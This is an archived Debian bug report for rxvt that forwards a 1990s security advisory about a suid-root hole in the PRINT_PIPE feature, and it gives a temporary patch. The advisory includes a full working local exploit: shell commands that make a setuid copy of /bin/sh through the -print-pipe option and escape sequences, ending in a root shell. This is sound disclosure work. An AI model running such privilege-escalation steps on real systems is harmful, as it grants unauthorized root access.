Bug#2147: rxvt security hole
Package: rxvt
Version: 2.10-1
There is a very serious bug that can grant root access through the
use of a suid root rxvt. The affected program is included in both
the development and stable releases. I tried it on my system and it took
less than one minute to gain root access from a normal user account.
Attached is the post to comp.os.linux.announce regarding this problem.
-----BEGIN PGP SIGNED MESSAGE-----
[This was recently forwarded over the linux-alert mailing list. I left
the full text of the exploit in this post due to the fact that it is
already quite well publicized. I have not verified the exploit code
myself. --Jeff.]
There is a major security hole in rxvt, a terminal emulator for X, when it
is run on systems suid root, as is required on many configurations in order to
write to the utmp file. It is obvious from the code that this program was
not written to be run suid root, its a pity that sysadmins that install the
compiled versions of this sort of code don't see the same warnings of 'run
suid root at your own risk' that the people that put together a distribution
with it that way see in the makefile.
The conditions that allow this particular hole to be exploited is rxvt
compiled with the PRINT_PIPE option, and is running suid root. The program
sets the pipe to "lpr", without a pathname, but its even easier than that
to exploit because we can set the pipe to whatever we want with the -print-pipe
option on the rxvt command line. Although the programs gives up its root
privileges when forking to runn a shell or other command, the original program
continues running suid root the entire execution of the program.
Because the popen() call runs as root, whatever program that pipe opens
will execute immediately as root. In order to start the printer pipe, the
vt100 printer-on command is ESC[5i. The pipe can then be closed with the
printer-off commad, ESC[4i. Exploiting this is extremely easy.
Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
rxvt suid root (and compiled with PRINT_PIPE)
Requirements: account on system, X server
Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
Security Compromise: root
Author: Dave M. (davem@cmu.edu)
Synopsis: rxvt fails to give up root privileges before
opening a pipe to a program that can be specified
by the user.
Exploit:
1. Set DISPLAY environment variable if necessary so you can use x clients.
2. In user shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. In rxvt xclient:
$ cat
ESC[5i
ESC[4i
(The client will close at this point with a broken pipe)
4. $ /tmp/rxsh
# whoami
root
#
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
r16NALs+Zwo=
=BzNN
-----END PGP SIGNATURE-----
------------------------------------------------------------------------
The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
have their implicit approval for security announcements, by prior
arrangement.
------------------------------------------------------------------------
Reply to: